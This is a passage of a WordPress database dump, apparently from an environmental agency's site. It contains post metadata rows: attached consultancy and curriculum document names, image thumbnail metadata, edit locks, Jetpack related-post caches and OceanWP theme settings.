3673;}}}}'),(24799,3682,'_wp_attached_file','2021/04/FINAL-DRAFT-EKMS-CURRICULUM-MARCH-19-2021-CCCD.pdf'),(24800,3683,'_wp_attached_file','2021/04/FINAL-DRAFT-LESSONS-LEARNED-TOR-MARCH-19-2021-CCCD.pdf'),(24801,3664,'_wp_page_template','default'),(24802,3664,'_jetpack_related_posts_cache','a:1:{s:32:\"cb296ed3ffbce3138fead246766dd8cd\";a:2:{s:7:\"expires\";i:1628888484;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3691;}i:1;a:1:{s:2:\"id\";i:3694;}i:2;a:1:{s:2:\"id\";i:1877;}}}}'),(24806,3688,'_wp_attached_file','2021/04/Untitled.png'),(24807,3688,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:514;s:4:\"file\";s:20:\"2021/04/Untitled.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Untitled-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Untitled-768x386.png\";s:5:\"width\";i:768;s:6:\"height\";i:386;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24808,3664,'_thumbnail_id','3688'),(24809,1872,'_last_editor_used_jetpack','classic-editor'),(24810,1855,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1000;s:6:\"height\";i:554;s:4:\"file\";s:16:\"featured_ccd.jpg\";}}'),(24811,3691,'_last_editor_used_jetpack','classic-editor'),(24812,3691,'_edit_lock','1618566110:42'),(24813,3691,'_edit_last','42'),(24814,3692,'_wp_attached_file','2021/04/cartagena.png'),(24815,3692,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:514;s:4:\"file\";s:21:\"2021/04/cartagena.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"cartagena-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"cartagena-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"cartagena-768x386.png\";s:5:\"width\";i:768;s:6:\"height\";i:386;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24816,3691,'_thumbnail_id','3692'),(24817,3691,'_wp_page_template','default'),(24818,3691,'_jetpack_related_posts_cache','a:1:{s:32:\"cb296ed3ffbce3138fead246766dd8cd\";a:2:{s:7:\"expires\";i:1628888552;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3694;}i:1;a:1:{s:2:\"id\";i:3664;}i:2;a:1:{s:2:\"id\";i:1877;}}}}'),(24819,3694,'_last_editor_used_jetpack','classic-editor'),(24820,3694,'_edit_lock','1618566683:42'),(24821,3694,'_edit_last','42'),(24822,3695,'_wp_attached_file','2021/04/nagoya.png'),(24823,3695,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:514;s:4:\"file\";s:18:\"2021/04/nagoya.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"nagoya-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"nagoya-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"nagoya-768x386.png\";s:5:\"width\";i:768;s:6:\"height\";i:386;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24824,3694,'_thumbnail_id','3695'),(24825,3694,'_wp_page_template','default'),(24828,3694,'_jetpack_related_posts_cache','a:1:{s:32:\"cb296ed3ffbce3138fead246766dd8cd\";a:2:{s:7:\"expires\";i:1628847361;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1870;}i:1;a:1:{s:2:\"id\";i:3691;}i:2;a:1:{s:2:\"id\";i:1877;}}}}'),(24829,3698,'_last_editor_used_jetpack','classic-editor'),(24830,3698,'_edit_lock','1629363033:42'),(24831,3698,'_edit_last','42'),(24832,3699,'_wp_attached_file','2021/04/Consultancy-to-undertake-financial-and-economic-analysis-of-monitoring-enforcement-and-compliance-of-Rio-Convwntions-implementation.docx'),(24833,3700,'_wp_attached_file','2021/04/consultancy-to-review-the-Environmental-Knowledge-Management-System-EKMS-and-procure-addition-subscriptions-and-software.docx'),(24834,3701,'_wp_attached_file','2021/04/Consultancy-to-distribute-environmental-awareness-brochures-posters-and-fact-sheets-through-outdoor-drama-and-cultural-performances.docx'),(24835,3702,'_wp_attached_file','2021/04/CONSULTANCY-TO-DEVELOP-AWARENESS-MODULE-FOR-INSTITUTIONS-APRIL-2021.docx'),(24836,3703,'_wp_attached_file','2021/04/Consultancy-to-develop-a-15-years-Resource-Mobilization-Strategy-for-the-sustainability-of-the-Environmental-Knowledge-Management-System.docx'),(24837,3704,'_last_editor_used_jetpack','classic-editor'),(24838,3704,'_edit_lock','1629362960:42'),(24839,3704,'_edit_last','42'),(24840,3705,'_last_editor_used_jetpack','classic-editor'),(24841,3705,'_edit_lock','1629362853:42'),(24842,3705,'_edit_last','42'),(24843,3706,'_last_editor_used_jetpack','classic-editor'),(24844,3706,'_edit_lock','1629362794:42'),(24845,3706,'_edit_last','42'),(24846,3707,'_last_editor_used_jetpack','classic-editor'),(24847,3707,'_edit_lock','1629362653:42'),(24848,3707,'_edit_last','42'),(24849,3706,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628653460;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3585;}i:1;a:1:{s:2:\"id\";i:3680;}i:2;a:1:{s:2:\"id\";i:3673;}}}}'),(24850,3705,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628730646;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3181;}i:1;a:1:{s:2:\"id\";i:3053;}i:2;a:1:{s:2:\"id\";i:3585;}}}}'),(24851,3704,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1627614186;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3178;}i:1;a:1:{s:2:\"id\";i:3181;}i:2;a:1:{s:2:\"id\";i:3707;}}}}'),(24852,3698,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1627998266;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3175;}i:1;a:1:{s:2:\"id\";i:3704;}i:2;a:1:{s:2:\"id\";i:3675;}}}}'),(24853,3707,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628615607;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3704;}i:1;a:1:{s:2:\"id\";i:3056;}i:2;a:1:{s:2:\"id\";i:3178;}}}}'),(24854,3710,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1629002149;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3738;}i:1;a:1:{s:2:\"id\";i:3482;}i:2;a:1:{s:2:\"id\";i:3124;}}}}'),(24855,3710,'_edit_lock','1620300685:42'),(24856,3710,'_last_editor_used_jetpack','block-editor'),(24857,3711,'_wp_attached_file','2021/05/epa.png'),(24858,3711,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/05/epa.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"epa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"epa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"epa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24861,3710,'_wp_old_date','2021-05-06'),(24862,3710,'_thumbnail_id','3711'),(24863,3710,'_edit_last','42'),(24864,3710,'ocean_gallery_link_images','off'),(24865,3710,'ocean_sidebar','0'),(24866,3710,'ocean_second_sidebar','0'),(24867,3710,'ocean_disable_margins','enable'),(24868,3710,'ocean_display_top_bar','default'),(24869,3710,'ocean_display_header','default'),(24870,3710,'ocean_center_header_left_menu','0'),(24871,3710,'ocean_custom_header_template','0'),(24872,3710,'ocean_header_custom_menu','0'),(24873,3710,'ocean_menu_typo_font_family','0'),(24874,3710,'ocean_disable_title','default'),(24875,3710,'ocean_disable_heading','default'),(24876,3710,'ocean_disable_breadcrumbs','default'),(24877,3710,'ocean_display_footer_widgets','default'),(24878,3710,'ocean_display_footer_bottom','default'),(24879,3710,'ocean_custom_footer_template','0'),(24880,3710,'ocean_link_format_target','self'),(24881,3710,'ocean_quote_format_link','post'),(24882,3710,'osh_disable_topbar_sticky','default'),(24883,3710,'osh_disable_header_sticky','default'),(24884,3710,'osh_sticky_header_style','default'),(24885,3714,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628434095;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3034;}i:1;a:1:{s:2:\"id\";i:3721;}i:2;a:1:{s:2:\"id\";i:3498;}}}}'),(24886,3714,'_edit_lock','1621333207:42'),(24887,3714,'_last_editor_used_jetpack','block-editor'),(24888,3715,'_wp_attached_file','2021/05/moa.png'),(24889,3715,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/05/moa.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"moa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"moa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"moa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24892,3714,'_thumbnail_id','3715'),(24893,3714,'_edit_last','42'),(24894,3714,'ocean_gallery_link_images','off'),(24895,3714,'ocean_sidebar','0'),(24896,3714,'ocean_second_sidebar','0'),(24897,3714,'ocean_disable_margins','enable'),(24898,3714,'ocean_display_top_bar','default'),(24899,3714,'ocean_display_header','default'),(24900,3714,'ocean_center_header_left_menu','0'),(24901,3714,'ocean_custom_header_template','0'),(24902,3714,'ocean_header_custom_menu','0'),(24903,3714,'ocean_menu_typo_font_family','0'),(24904,3714,'ocean_disable_title','default'),(24905,3714,'ocean_disable_heading','default'),(24906,3714,'ocean_disable_breadcrumbs','default'),(24907,3714,'ocean_display_footer_widgets','default'),(24908,3714,'ocean_display_footer_bottom','default'),(24909,3714,'ocean_custom_footer_template','0'),(24910,3714,'ocean_link_format_target','self'),(24911,3714,'ocean_quote_format_link','post'),(24912,3714,'osh_disable_topbar_sticky','default'),(24913,3714,'osh_disable_header_sticky','default'),(24914,3714,'osh_sticky_header_style','default'),(24917,3714,'_wp_old_date','2021-05-18'),(24925,3721,'_jetpack_related_posts_cache','a:2:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628740146;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3063;}i:1;a:1:{s:2:\"id\";i:3117;}i:2;a:1:{s:2:\"id\";i:2956;}}}s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1628762608;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3063;}i:1;a:1:{s:2:\"id\";i:3117;}i:2;a:1:{s:2:\"id\";i:2956;}i:3;a:1:{s:2:\"id\";i:3038;}i:4;a:1:{s:2:\"id\";i:3316;}i:5;a:1:{s:2:\"id\";i:3738;}}}}'),(24926,3721,'_edit_lock','1624369082:42'),(24927,3721,'_last_editor_used_jetpack','block-editor'),(24928,3722,'_wp_attached_file','2021/06/ciepa.png'),(24929,3722,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2021/06/ciepa.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"ciepa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"ciepa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"ciepa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24932,3721,'_wp_old_date','2021-06-22'),(24933,3721,'_thumbnail_id','3722'),(24934,3721,'_edit_last','42'),(24935,3721,'ocean_gallery_link_images','off'),(24936,3721,'ocean_sidebar','0'),(24937,3721,'ocean_second_sidebar','0'),(24938,3721,'ocean_disable_margins','enable'),(24939,3721,'ocean_display_top_bar','default'),(24940,3721,'ocean_display_header','default'),(24941,3721,'ocean_center_header_left_menu','0'),(24942,3721,'ocean_custom_header_template','0'),(24943,3721,'ocean_header_custom_menu','0'),(24944,3721,'ocean_menu_typo_font_family','0'),(24945,3721,'ocean_disable_title','default'),(24946,3721,'ocean_disable_heading','default'),(24947,3721,'ocean_disable_breadcrumbs','default'),(24948,3721,'ocean_display_footer_widgets','default'),(24949,3721,'ocean_display_footer_bottom','default'),(24950,3721,'ocean_custom_footer_template','0'),(24951,3721,'ocean_link_format_target','self'),(24952,3721,'ocean_quote_format_link','post'),(24953,3721,'osh_disable_topbar_sticky','default'),(24954,3721,'osh_disable_header_sticky','default'),(24955,3721,'osh_sticky_header_style','default'),(24956,3724,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627624330;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3069;}i:1;a:1:{s:2:\"id\";i:3731;}i:2;a:1:{s:2:\"id\";i:3027;}}}}'),(24957,3724,'_edit_lock','1624369799:42'),(24958,3724,'_last_editor_used_jetpack','block-editor'),(24959,3725,'_wp_attached_file','2021/06/chemicals.png'),(24960,3725,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:21:\"2021/06/chemicals.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"chemicals-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"chemicals-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"chemicals-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24963,3724,'_wp_old_date','2021-06-22'),(24964,3724,'_thumbnail_id','3725'),(24965,3724,'_edit_last','42'),(24966,3724,'ocean_gallery_link_images','off'),(24967,3724,'ocean_sidebar','0'),(24968,3724,'ocean_second_sidebar','0'),(24969,3724,'ocean_disable_margins','enable'),(24970,3724,'ocean_display_top_bar','default'),(24971,3724,'ocean_display_header','default'),(24972,3724,'ocean_center_header_left_menu','0'),(24973,3724,'ocean_custom_header_template','0'),(24974,3724,'ocean_header_custom_menu','0'),(24975,3724,'ocean_menu_typo_font_family','0'),(24976,3724,'ocean_disable_title','default'),(24977,3724,'ocean_disable_heading','default'),(24978,3724,'ocean_disable_breadcrumbs','default'),(24979,3724,'ocean_display_footer_widgets','default'),(24980,3724,'ocean_display_footer_bottom','default'),(24981,3724,'ocean_custom_footer_template','0'),(24982,3724,'ocean_link_format_target','self'),(24983,3724,'ocean_quote_format_link','post'),(24984,3724,'osh_disable_topbar_sticky','default'),(24985,3724,'osh_disable_header_sticky','default'),(24986,3724,'osh_sticky_header_style','default'),(24987,3727,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628201164;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3531;}i:1;a:1:{s:2:\"id\";i:3479;}i:2;a:1:{s:2:\"id\";i:3045;}}}}'),(24988,3727,'_edit_lock','1624370107:42'),(24989,3727,'_last_editor_used_jetpack','block-editor'),(24990,3728,'_wp_attached_file','2021/06/esia.png'),(24991,3728,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2021/06/esia.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"esia-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"esia-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"esia-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24994,3727,'_wp_old_date','2021-06-22'),(24995,3727,'_thumbnail_id','3728'),(24996,3727,'_edit_last','42'),(24997,3727,'ocean_gallery_link_images','off'),(24998,3727,'ocean_sidebar','0'),(24999,3727,'ocean_second_sidebar','0'),(25000,3727,'ocean_disable_margins','enable'),(25001,3727,'ocean_display_top_bar','default'),(25002,3727,'ocean_display_header','default'),(25003,3727,'ocean_center_header_left_menu','0'),(25004,3727,'ocean_custom_header_template','0'),(25005,3727,'ocean_header_custom_menu','0'),(25006,3727,'ocean_menu_typo_font_family','0'),(25007,3727,'ocean_disable_title','default'),(25008,3727,'ocean_disable_heading','default'),(25009,3727,'ocean_disable_breadcrumbs','default'),(25010,3727,'ocean_display_footer_widgets','default'),(25011,3727,'ocean_display_footer_bottom','default'),(25012,3727,'ocean_custom_footer_template','0'),(25013,3727,'ocean_link_format_target','self'),(25014,3727,'ocean_quote_format_link','post'),(25015,3727,'osh_disable_topbar_sticky','default'),(25016,3727,'osh_disable_header_sticky','default'),(25017,3727,'osh_sticky_header_style','default'),(25020,3731,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628450466;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3724;}i:1;a:1:{s:2:\"id\";i:3069;}i:2;a:1:{s:2:\"id\";i:3066;}}}}'),(25021,3731,'_edit_lock','1624370509:42'),(25022,3731,'_last_editor_used_jetpack','block-editor'),(25025,3733,'_wp_attached_file','2021/06/chemical.png'),(25026,3733,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2021/06/chemical.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"chemical-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"chemical-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"chemical-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25029,3731,'_wp_old_date','2021-06-22'),(25030,3731,'_thumbnail_id','3733'),(25031,3731,'_edit_last','42'),(25032,3731,'ocean_gallery_link_images','off'),(25033,3731,'ocean_sidebar','0'),(25034,3731,'ocean_second_sidebar','0'),(25035,3731,'ocean_disable_margins','enable'),(25036,3731,'ocean_display_top_bar','default'),(25037,3731,'ocean_display_header','default'),(25038,3731,'ocean_center_header_left_menu','0'),(25039,3731,'ocean_custom_header_template','0'),(25040,3731,'ocean_header_custom_menu','0'),(25041,3731,'ocean_menu_typo_font_family','0'),(25042,3731,'ocean_disable_title','default'),(25043,3731,'ocean_disable_heading','default'),(25044,3731,'ocean_disable_breadcrumbs','default'),(25045,3731,'ocean_display_footer_widgets','default'),(25046,3731,'ocean_display_footer_bottom','default'),(25047,3731,'ocean_custom_footer_template','0'),(25048,3731,'ocean_link_format_target','self'),(25049,3731,'ocean_quote_format_link','post'),(25050,3731,'osh_disable_topbar_sticky','default'),(25051,3731,'osh_disable_header_sticky','default'),(25052,3731,'osh_sticky_header_style','default'),(25053,3735,'_edit_lock','1624370975:42'),(25054,3735,'_last_editor_used_jetpack','block-editor'),(25055,3735,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628451625;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3297;}i:1;a:1:{s:2:\"id\";i:3749;}i:2;a:1:{s:2:\"id\";i:3030;}}}}'),(25056,3736,'_wp_attached_file','2021/06/ndc.png'),(25057,3736,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/06/ndc.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"ndc-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"ndc-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"ndc-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25060,3735,'_wp_old_date','2021-06-22'),(25061,3735,'_thumbnail_id','3736'),(25062,3735,'_edit_last','42'),(25063,3735,'ocean_gallery_link_images','off'),(25064,3735,'ocean_sidebar','0'),(25065,3735,'ocean_second_sidebar','0'),(25066,3735,'ocean_disable_margins','enable'),(25067,3735,'ocean_display_top_bar','default'),(25068,3735,'ocean_display_header','default'),(25069,3735,'ocean_center_header_left_menu','0'),(25070,3735,'ocean_custom_header_template','0'),(25071,3735,'ocean_header_custom_menu','0'),(25072,3735,'ocean_menu_typo_font_family','0'),(25073,3735,'ocean_disable_title','default'),(25074,3735,'ocean_disable_heading','default'),(25075,3735,'ocean_disable_breadcrumbs','default'),(25076,3735,'ocean_display_footer_widgets','default'),(25077,3735,'ocean_display_footer_bottom','default'),(25078,3735,'ocean_custom_footer_template','0'),(25079,3735,'ocean_link_format_target','self'),(25080,3735,'ocean_quote_format_link','post'),(25081,3735,'osh_disable_topbar_sticky','default'),(25082,3735,'osh_disable_header_sticky','default'),(25083,3735,'osh_sticky_header_style','default'),(25084,3738,'_jetpack_related_posts_cache','a:1:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1627466340;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3038;}i:1;a:1:{s:2:\"id\";i:3117;}i:2;a:1:{s:2:\"id\";i:3063;}i:3;a:1:{s:2:\"id\";i:2801;}i:4;a:1:{s:2:\"id\";i:3430;}i:5;a:1:{s:2:\"id\";i:2956;}}}}'),(25085,3738,'_edit_lock','162